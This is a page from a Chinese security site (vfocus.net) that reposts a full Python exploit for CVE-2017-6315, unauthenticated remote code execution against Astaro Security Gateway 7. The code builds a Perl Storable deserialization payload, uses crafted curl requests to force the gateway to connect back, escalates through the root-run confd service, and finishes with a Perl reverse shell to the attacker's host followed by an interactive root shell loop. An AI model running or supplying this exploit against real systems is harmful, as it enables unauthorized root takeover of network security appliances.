首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Astaro Security Gateway 7 - Remote Code Execution
来源:vfocus.net 作者:Palaczynski 发布时间:2017-09-18  
#!/usr/bin/python # Astaro Security Gateway v7 - Unauthenticated Remote Code Execution # Exploit Authors: Jakub Palaczynski and Maciej Grabiec # Tested on versions: 7.500 and 7.506 # Date: 13.12.2016 # Vendor Homepage: https://www.sophos.com/ # CVE: CVE-2017-6315 import socket import sys import os import threading import subprocess import time # print help or assign arguments if len(sys.argv) != 3: sys.stderr.write("[-]Usage: python %s \n" % sys.argv[0]) sys.stderr.write("[-]Exemple: python %s 192.168.1.1 192.168.1.2:4444\n" % sys.argv[0]) sys.exit(1) lhost = sys.argv[1] # our ip address rhost = sys.argv[2] # ip address and port of vulnerable ASG v7 # for additional thread to send requests in parallel class requests (threading.Thread): def run(self): print 'Sending requests to trigger vulnerability.' time.sleep(5) # first request to clear cache os.system('curl -s -m 5 -X POST https://' + rhost + '/index.plx -d \'{"objs": [{"FID": "init"}],"backend_address": "' + lhost + ':81"}\' -k > /dev/null') # second request to trigger reverse connection os.system('curl -s -m 20 -X POST https://' + rhost + '/index.plx -d \'{"objs": [{"FID": "init"}],"backend_address": "' + lhost + ':80"}\' -k > /dev/null') # function that creates socket def create_socket(port): sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) sock.bind(('0.0.0.0', port)) sock.listen(10) conn, addr = sock.accept() return sock, conn, addr # function to receive data from socket def receive(conn): sys.stdout.write(conn.recv(1024)) sys.stdout.flush() sys.stdout.write(conn.recv(1024)) sys.stdout.flush() # Thanks to Agarri: http://www.agarri.fr/docs/PoC_thaw_perl58.pl # This script creates serialized object that makes reverse connection and executes everything what it receives on a socket file = """ #!/usr/bin/perl use strict; use MIME::Base64 qw( encode_base64 ); use Storable qw( nfreeze ); use LWP::UserAgent; my $package_name = "A" x 252; my $pack = qq~{ package $package_name; sub STORABLE_freeze { return 1; } }~; eval($pack); my $payload = qq~POSIX;eval('sleep(10);use IO::Socket::INET;\$r=IO::Socket::INET->new(\"""" + lhost + """:443");if (\$r) {eval(<\$r>);}');exit;~; my $padding = length($package_name) - length($payload); $payload = $payload . (";" x $padding); my $data = bless { ignore => 'this' }, $package_name; my $frozen = nfreeze($data); $frozen =~ s/$package_name/$payload/g; my $encodedSize = length($frozen); my $pakiet = print(pack("N", $encodedSize), $frozen); print "$frozen"; """ # save file, run perl script and save our serialized payload f = open("payload.pl", "w") f.write(file) f.close() serialized = os.popen("perl ./payload.pl").read() os.remove("./payload.pl") # start thread that sends requests thread = requests() thread.start() # open socket that receives connection from index sock, conn, addr = create_socket(80) print 'Received connection from: ' + addr[0] + ':' + str(addr[1]) + '.' print 'Sending 1st stage payload.' data = conn.recv(256) # say hello to RPC client conn.sendall(data) data = conn.recv(256) # send serialized object that initiates connect back connection and executes everything what it receives on a socket conn.sendall(serialized) sock.close() # create second socket that receives connection from index and sends additional commands sock, conn, addr = create_socket(443) print 'Sending 2nd stage payload.' # send commands that exploit confd (running with root permissions) which is running on localhost - the same exploitation as for first stage conn.sendall('sleep(10);use IO::Socket::INET;my $s = new IO::Socket::INET(PeerHost => "127.0.0.1",PeerPort => "4472",Proto => "tcp");$s->send("\\x00\\x00\\x00\\x1d\\x05\\x06\\x02\\x00\\x00\\x00\\x04\\x0a\\x04\\x70\\x72\\x70\\x63\\x0a\\x04\\x30\\x2e\\x30\\x31\\x0a\\x06\\x73\\x79\\x73\\x74\\x65\\x6d\\x0a\\x00");my $a;$s->recv($a,1024);$s->send("' + "\\x" + "\\x".join("{:02x}".format(ord(c)) for c in serialized) + '");$s->recv($a,1024);$s->close();\n') sock.close() # create socket that receives connection from confd and sends commands to get reverse shell sock, conn, addr = create_socket(443) print 'Sending 3rd stage payload.' # send reverse shell payload conn.sendall('sleep(20);use Socket;$i="' + lhost + '";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};\n') sock.close() # create socket to receive shell with root permissions print '\nNow you need to wait for shell.' sock, conn, addr = create_socket(443) receive(conn) while True: cmd = raw_input("") if cmd == 'exit': break else: conn.send(cmd + "\n") receive(conn) sock.close()
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Jungo DriverWizard WinDriver 1
·D-Link DIR8xx Routers - Leak C
·WebKit JSC BytecodeGenerator::
·D-Link DIR8xx Routers - Root R
·tcprewrite 3.4.4 Buffer Overfl
·D-Link DIR8xx Routers - Local
·MobaXtrem 10.4 Remote Code Exe
·Netdecision 5.8.2 - Local Priv
·Docker Daemon Unprotected TCP
·Digirez 3.4 - Cross-Site Reque
·D-Link 850L XSS / Backdoor / C
·Digileave 1.2 - Cross-Site Req
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved